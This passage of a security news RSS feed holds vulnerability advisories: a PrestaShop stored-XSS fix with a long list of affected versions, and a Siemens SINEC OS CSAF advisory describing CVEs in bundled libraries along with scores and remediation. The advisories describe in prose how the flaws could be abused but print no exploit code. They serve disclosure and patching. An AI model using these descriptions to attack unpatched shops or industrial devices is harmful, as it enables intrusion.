            <li>PrestaShop 8.1.2</li>
        
            <li>PrestaShop 8.1.3</li>
        
            <li>PrestaShop 8.1.4</li>
        
            <li>PrestaShop 8.1.5</li>
        
            <li>PrestaShop 8.1.6</li>
        
            <li>PrestaShop 8.1.7</li>
        
            <li>PrestaShop 8.2.0</li>
        
            <li>PrestaShop 8.2.1</li>
        
            <li>PrestaShop 8.2.2</li>
        
            <li>PrestaShop 8.2.3</li>
        
            <li>PrestaShop 8.2.4</li>
        
            <li>PrestaShop 9.0.0</li>
        
            <li>PrestaShop 9.0.0-1.0-RC.1</li>
        
            <li>PrestaShop 9.0.1</li>
        
            <li>PrestaShop 9.0.1-1.0</li>
        
            <li>PrestaShop 9.0.2</li>
        
            <li>PrestaShop 9.0.2-2.0</li>
        
            <li>PrestaShop 9.0.3</li>
        
            <li>PrestaShop 9.0.3-3.0</li>
        
            <li>PrestaShop 9.1.0-3.0-beta.1</li>
        
            <li>PrestaShop 9.1.0-4.0-RC.1</li>
        
    </ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Multiple stored XSS via unprotected back-office template variables p3]]></title>
<description><![CDATA[An attacker who can inject data into the database either through limited back-office access or by chaining an existing vulnerability such as SQL injection can exploit unescaped variables in back-office templates to execute arbitrary JavaScript within an authenticated administrator's session.
The ...]]></description>
<link>https://tsecurity.de/de/3652662/sicherheitsluecken/multiple-stored-xss-via-unprotected-back-office-template-variables-p3/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652662/sicherheitsluecken/multiple-stored-xss-via-unprotected-back-office-template-variables-p3/</guid>
<pubDate>Tue, 07 Jul 2026 21:54:59 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>An attacker who can inject data into the database either through limited back-office access or by chaining an existing vulnerability such as SQL injection can exploit unescaped variables in back-office templates to execute arbitrary JavaScript within an authenticated administrator's session.
<br>The fix escapes HTML output across dozens of legacy Smarty (.tpl) and modern Twig (.html.twig) back-office templates, including group names, category paths, customer thread and message content, shop names, translation modules, and the admin login page. It also hardens the translation pipeline by introducing a dedicated HTMLPurifier-backed Twig extension (RawPurifiedExtension), wired through TranslationService and the Symfony service container.</p>

    <p>This vulnerability affects the following application versions:</p>
    <ul>
        
            <li>PrestaShop 1.6.0.1</li>
        
            <li>PrestaShop 1.6.0.1 alpha 1</li>
        
            <li>PrestaShop 1.6.0.2</li>
        
            <li>PrestaShop 1.6.0.2 alpha 2</li>
        
            <li>PrestaShop 1.6.0.3</li>
        
            <li>PrestaShop 1.6.0.3 beta 1</li>
        
            <li>PrestaShop 1.6.0.4</li>
        
            <li>PrestaShop 1.6.0.4 RC1</li>
        
            <li>PrestaShop 1.6.0.5</li>
        
            <li>PrestaShop 1.6.0.6</li>
        
            <li>PrestaShop 1.6.0.7</li>
        
            <li>PrestaShop 1.6.0.8</li>
        
            <li>PrestaShop 1.6.0.9</li>
        
            <li>PrestaShop 1.6.0.10</li>
        
            <li>PrestaShop 1.6.0.11</li>
        
            <li>PrestaShop 1.6.0.12</li>
        
            <li>PrestaShop 1.6.0.13</li>
        
            <li>PrestaShop 1.6.0.14</li>
        
            <li>PrestaShop 1.6.1.0</li>
        
            <li>PrestaShop 1.6.1.0 RC4</li>
        
            <li>PrestaShop 1.6.1.0 RC5</li>
        
            <li>PrestaShop 1.6.1.1</li>
        
            <li>PrestaShop 1.6.1.1 RC1</li>
        
            <li>PrestaShop 1.6.1.1 RC2</li>
        
            <li>PrestaShop 1.6.1.2</li>
        
            <li>PrestaShop 1.6.1.2 RC1</li>
        
            <li>PrestaShop 1.6.1.2 RC2</li>
        
            <li>PrestaShop 1.6.1.2 RC3</li>
        
            <li>PrestaShop 1.6.1.2 RC4</li>
        
            <li>PrestaShop 1.6.1.3</li>
        
            <li>PrestaShop 1.6.1.3 RC1</li>
        
            <li>PrestaShop 1.6.1.4</li>
        
            <li>PrestaShop 1.6.1.5</li>
        
            <li>PrestaShop 1.6.1.6</li>
        
            <li>PrestaShop 1.6.1.7</li>
        
            <li>PrestaShop 1.6.1.8</li>
        
            <li>PrestaShop 1.6.1.9</li>
        
            <li>PrestaShop 1.6.1.10</li>
        
            <li>PrestaShop 1.6.1.11</li>
        
            <li>PrestaShop 1.6.1.11 beta 1</li>
        
            <li>PrestaShop 1.6.1.11-beta.1.0</li>
        
            <li>PrestaShop 1.6.1.12</li>
        
            <li>PrestaShop 1.6.1.13</li>
        
            <li>PrestaShop 1.6.1.14</li>
        
            <li>PrestaShop 1.6.1.15</li>
        
            <li>PrestaShop 1.6.1.16</li>
        
            <li>PrestaShop 1.6.1.17</li>
        
            <li>PrestaShop 1.6.1.18</li>
        
            <li>PrestaShop 1.6.1.19</li>
        
            <li>PrestaShop 1.6.1.20</li>
        
            <li>PrestaShop 1.6.1.21</li>
        
            <li>PrestaShop 1.6.1.22</li>
        
            <li>PrestaShop 1.6.1.23</li>
        
            <li>PrestaShop 1.6.1.24</li>
        
            <li>PrestaShop 1.7.0.0</li>
        
            <li>PrestaShop 1.7.0.0 alpha3</li>
        
            <li>PrestaShop 1.7.0.0 alpha4</li>
        
            <li>PrestaShop 1.7.0.0 beta1</li>
        
            <li>PrestaShop 1.7.0.0 beta2</li>
        
            <li>PrestaShop 1.7.0.0 beta3</li>
        
            <li>PrestaShop 1.7.0.0 RC0</li>
        
            <li>PrestaShop 1.7.0.0 RC1</li>
        
            <li>PrestaShop 1.7.0.0 RC2</li>
        
            <li>PrestaShop 1.7.0.0 RC3</li>
        
            <li>PrestaShop 1.7.0.1</li>
        
            <li>PrestaShop 1.7.0.2</li>
        
            <li>PrestaShop 1.7.0.3</li>
        
            <li>PrestaShop 1.7.0.4</li>
        
            <li>PrestaShop 1.7.0.5</li>
        
            <li>PrestaShop 1.7.0.6</li>
        
            <li>PrestaShop 1.7.1.0</li>
        
            <li>PrestaShop 1.7.1.0 beta1</li>
        
            <li>PrestaShop 1.7.1.1</li>
        
            <li>PrestaShop 1.7.1.2</li>
        
            <li>PrestaShop 1.7.2.0</li>
        
            <li>PrestaShop 1.7.2.0 RC 1</li>
        
            <li>PrestaShop 1.7.2.0-RC.1.0</li>
        
            <li>PrestaShop 1.7.2.1</li>
        
            <li>PrestaShop 1.7.2.2</li>
        
            <li>PrestaShop 1.7.2.3</li>
        
            <li>PrestaShop 1.7.2.4</li>
        
            <li>PrestaShop 1.7.2.5</li>
        
            <li>PrestaShop 1.7.3.0</li>
        
            <li>PrestaShop 1.7.3.0 beta 1</li>
        
            <li>PrestaShop 1.7.3.0 RC 1</li>
        
            <li>PrestaShop 1.7.3.1</li>
        
            <li>PrestaShop 1.7.3.2</li>
        
            <li>PrestaShop 1.7.3.3</li>
        
            <li>PrestaShop 1.7.3.4</li>
        
            <li>PrestaShop 1.7.4.0</li>
        
            <li>PrestaShop 1.7.4.0 beta 1</li>
        
            <li>PrestaShop 1.7.4.1</li>
        
            <li>PrestaShop 1.7.4.2</li>
        
            <li>PrestaShop 1.7.4.3</li>
        
            <li>PrestaShop 1.7.4.4</li>
        
            <li>PrestaShop 1.7.5.0</li>
        
            <li>PrestaShop 1.7.5.0 beta 1</li>
        
            <li>PrestaShop 1.7.5.0 RC 1</li>
        
            <li>PrestaShop 1.7.5.0-beta.1</li>
        
            <li>PrestaShop 1.7.5.0-RC.1</li>
        
            <li>PrestaShop 1.7.5.1</li>
        
            <li>PrestaShop 1.7.5.2</li>
        
            <li>PrestaShop 1.7.6.0</li>
        
            <li>PrestaShop 1.7.6.0 beta 1</li>
        
            <li>PrestaShop 1.7.6.0 RC 1</li>
        
            <li>PrestaShop 1.7.6.0 RC 2</li>
        
            <li>PrestaShop 1.7.6.0-beta.1</li>
        
            <li>PrestaShop 1.7.6.0-RC.1</li>
        
            <li>PrestaShop 1.7.6.0-RC.2</li>
        
            <li>PrestaShop 1.7.6.1</li>
        
            <li>PrestaShop 1.7.6.2</li>
        
            <li>PrestaShop 1.7.6.3</li>
        
            <li>PrestaShop 1.7.6.4</li>
        
            <li>PrestaShop 1.7.6.4  1</li>
        
            <li>PrestaShop 1.7.6.5</li>
        
            <li>PrestaShop 1.7.6.5  1</li>
        
            <li>PrestaShop 1.7.6.6</li>
        
            <li>PrestaShop 1.7.6.7</li>
        
            <li>PrestaShop 1.7.6.8</li>
        
            <li>PrestaShop 1.7.6.9</li>
        
            <li>PrestaShop 1.7.7.0</li>
        
            <li>PrestaShop 1.7.7.0 beta 1</li>
        
            <li>PrestaShop 1.7.7.0 beta 2</li>
        
            <li>PrestaShop 1.7.7.0 RC 1</li>
        
            <li>PrestaShop 1.7.7.0-beta.1</li>
        
            <li>PrestaShop 1.7.7.0-beta.2</li>
        
            <li>PrestaShop 1.7.7.0-RC.1</li>
        
            <li>PrestaShop 1.7.7.1</li>
        
            <li>PrestaShop 1.7.7.2</li>
        
            <li>PrestaShop 1.7.7.3</li>
        
            <li>PrestaShop 1.7.7.4</li>
        
            <li>PrestaShop 1.7.7.5</li>
        
            <li>PrestaShop 1.7.7.6</li>
        
            <li>PrestaShop 1.7.7.7</li>
        
            <li>PrestaShop 1.7.7.8</li>
        
            <li>PrestaShop 1.7.7.8  1</li>
        
            <li>PrestaShop 1.7.8.0</li>
        
            <li>PrestaShop 1.7.8.0 beta 1</li>
        
            <li>PrestaShop 1.7.8.0  1</li>
        
            <li>PrestaShop 1.7.8.0 RC 1</li>
        
            <li>PrestaShop 1.7.8.0-beta.1</li>
        
            <li>PrestaShop 1.7.8.0-RC.1</li>
        
            <li>PrestaShop 1.7.8.1</li>
        
            <li>PrestaShop 1.7.8.2</li>
        
            <li>PrestaShop 1.7.8.2  1</li>
        
            <li>PrestaShop 1.7.8.3</li>
        
            <li>PrestaShop 1.7.8.4</li>
        
            <li>PrestaShop 1.7.8.5</li>
        
            <li>PrestaShop 1.7.8.6</li>
        
            <li>PrestaShop 1.7.8.7</li>
        
            <li>PrestaShop 1.7.8.7  1</li>
        
            <li>PrestaShop 1.7.8.8</li>
        
            <li>PrestaShop 1.7.8.9</li>
        
            <li>PrestaShop 1.7.8.10</li>
        
            <li>PrestaShop 1.7.8.11</li>
        
            <li>PrestaShop 8.0.0</li>
        
            <li>PrestaShop 8.0.1</li>
        
            <li>PrestaShop 8.0.2</li>
        
            <li>PrestaShop 8.0.3</li>
        
            <li>PrestaShop 8.0.4</li>
        
            <li>PrestaShop 8.0.5</li>
        
            <li>PrestaShop 8.1.0</li>
        
            <li>PrestaShop 8.1.1</li>
        
            <li>PrestaShop 8.1.2</li>
        
            <li>PrestaShop 8.1.3</li>
        
            <li>PrestaShop 8.1.4</li>
        
            <li>PrestaShop 8.1.5</li>
        
            <li>PrestaShop 8.1.6</li>
        
            <li>PrestaShop 8.1.7</li>
        
            <li>PrestaShop 8.2.0</li>
        
            <li>PrestaShop 8.2.1</li>
        
            <li>PrestaShop 8.2.2</li>
        
            <li>PrestaShop 8.2.3</li>
        
            <li>PrestaShop 8.2.4</li>
        
            <li>PrestaShop 9.0.0</li>
        
            <li>PrestaShop 9.0.0-1.0-RC.1</li>
        
            <li>PrestaShop 9.0.1</li>
        
            <li>PrestaShop 9.0.1-1.0</li>
        
            <li>PrestaShop 9.0.2</li>
        
            <li>PrestaShop 9.0.2-2.0</li>
        
            <li>PrestaShop 9.0.3</li>
        
            <li>PrestaShop 9.0.3-3.0</li>
        
            <li>PrestaShop 9.1.0-3.0-beta.1</li>
        
            <li>PrestaShop 9.1.0-4.0-RC.1</li>
        
    </ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Siemens SINEC OS]]></title>
<description><![CDATA[View CSAF
Summary
SINEC OS before V4.0 contains multiple vulnerabilities. Siemens has released a new version for RUGGEDCOM RST2428P and recommends to update to the latest version.
The following versions of Siemens SINEC OS are affected:

RUGGEDCOM RST2428P (6GK6242-6PA00) vers:intdot/cork. The "*...]]></description>
<link>https://tsecurity.de/de/3652271/it-security-nachrichten/siemens-sinec-os/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652271/it-security-nachrichten/siemens-sinec-os/</guid>
<pubDate>Tue, 07 Jul 2026 18:55:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-188-05.json"><strong>View CSAF</strong></a></p>
<h2>Summary</h2>
<p><strong>SINEC OS before V4.0 contains multiple vulnerabilities. Siemens has released a new version for RUGGEDCOM RST2428P and recommends to update to the latest version.</strong></p>
<p>The following versions of Siemens SINEC OS are affected:</p>
<ul>
<li>RUGGEDCOM RST2428P (6GK6242-6PA00) vers:intdot/&lt;4.0 </li>
</ul>
<div class="csaf-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS</th>
<th role="columnheader">Vendor</th>
<th role="columnheader">Equipment</th>
<th role="columnheader">Vulnerabilities</th>
</tr>
</thead>
<tbody>
<tr>
<td>v3 9.8</td>
<td>Siemens</td>
<td>Siemens SINEC OS</td>
<td>Improper Restriction of Operations within the Bounds of a Memory Buffer, Improper Resource Shutdown or Release, Integer Overflow or Wraparound, Stack-based Buffer Overflow, Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), Uncontrolled Recursion, Out-of-bounds Read, Covert Timing Channel, Improper Input Validation, Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution'), Improper Update of Reference Count, Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition'), Multiple Releases of Same Resource or Handle, Permissive Regular Expression, Expired Pointer Dereference, Incorrect Bitwise Shift of Integer, Out-of-bounds Write, User Interface (UI) Misrepresentation of Critical Information, Improper Access Control, Insertion of Sensitive Information Into Sent Data, Inefficient Algorithmic Complexity, Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), Authentication Bypass by Primary Weakness, NULL Pointer Dereference, Active Debug Code, Loop with Unreachable Exit Condition ('Infinite Loop'), Missing Synchronization, External Control of File Name or Path, Privilege Dropping / Lowering Errors, Use of Web Browser Cache Containing Sensitive Information</td>
</tr>
</tbody>
</table>
</div>
<h3>Background</h3>
<ul>
<li><strong>Critical Infrastructure Sectors: </strong>Critical Manufacturing, Transportation Systems, Energy, Healthcare and Public Health, Financial Services, Government Services and Facilities</li>
<li><strong>Countries/Areas Deployed: </strong>Worldwide</li>
<li><strong>Company Headquarters Location: </strong>Germany</li>
</ul>
<hr>
<h2>Vulnerabilities</h2>
<div class="csaf-accordion">
<p><a class="csaf-accordion-toggle-all" href="https://www.cisa.gov/#">Expand All +</a></p>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-1352</a></h3>
<div class="csaf-accordion-content">
<p>A vulnerability has been found in GNU elfutils 0.192 and classified as critical. This vulnerability affects the function __libdw_thread_tail in the library libdw_alloc.c of the component eu-readelf. The manipulation of the argument w leads to memory corruption. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The name of the patch is 2636426a091bd6c6f7f02e49ab20d4cdc6bfc753. It is recommended to apply a patch to fix this issue.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-1352">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/119.html">CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L">CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-1376</a></h3>
<div class="csaf-accordion-content">
<p>A vulnerability classified as problematic was found in GNU elfutils 0.192. This vulnerability affects the function elf_strptr in the library /libelf/elf_strptr.c of the component eu-strip. The manipulation leads to denial of service. It is possible to launch the attack on the local host. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The name of the patch is b16f441cca0a4841050e3215a9f120a6d8aea918. It is recommended to apply a patch to fix this issue.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-1376">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/404.html">CWE-404 Improper Resource Shutdown or Release</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>2.5</td>
<td>LOW</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-6052</a></h3>
<div class="csaf-accordion-content">
<p>A flaw was found in how GLib’s GString manages memory when adding data to strings. If a string is already very large, combining it with more input can cause a hidden overflow in the size calculation. This makes the system think it has enough memory when it doesn’t. As a result, data may be written past the end of the allocated memory, leading to crashes or memory corruption.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-6052">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/190.html">CWE-190 Integer Overflow or Wraparound</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>3.7</td>
<td>LOW</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L">CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-6141</a></h3>
<div class="csaf-accordion-content">
<p>A vulnerability has been found in GNU ncurses up to 6.5-20250322 and classified as problematic. This vulnerability affects the function postprocess_termcap of the file tinfo/parse_entry.c. The manipulation leads to stack-based buffer overflow. The attack needs to be approached locally. Upgrading to version 6.5-20250329 is able to address this issue. It is recommended to upgrade the affected component.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-6141">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/121.html">CWE-121 Stack-based Buffer Overflow</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>3.3</td>
<td>LOW</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-6170</a></h3>
<div class="csaf-accordion-content">
<p>A flaw was found in the interactive shell of the xmllint command-line tool, used for parsing XML files. When a user inputs an overly long command, the program does not check the input size properly, which can cause it to crash. This issue might allow attackers to run harmful code in rare configurations without modern protections.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-6170">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/121.html">CWE-121 Stack-based Buffer Overflow</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>2.5</td>
<td>LOW</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L">CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-7039</a></h3>
<div class="csaf-accordion-content">
<p>A flaw was found in glib. An integer overflow during temporary file creation leads to an out-of-bounds memory access, allowing an attacker to potentially perform path traversal or access private temporary file content by creating symbolic links. This vulnerability allows a local attacker to manipulate file paths and access unauthorized data. The core issue stems from insufficient validation of file path lengths during temporary file operations.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-7039">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/22.html">CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>3.7</td>
<td>LOW</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N">CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-8732</a></h3>
<div class="csaf-accordion-content">
<p>A vulnerability was found in libxml2 up to 2.14.5. It has been declared as problematic. This vulnerability affects the function xmlParseSGMLCatalog of the component xmlcatalog. The manipulation leads to uncontrolled recursion. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. The code maintainer explains, that "[t]he issue can only be triggered with untrusted SGML catalogs and it makes absolutely no sense to use untrusted catalogs. I also doubt that anyone is still using SGML catalogs at all."</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-8732">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/674.html">CWE-674 Uncontrolled Recursion</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>3.3</td>
<td>LOW</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-9086</a></h3>
<div class="csaf-accordion-content">
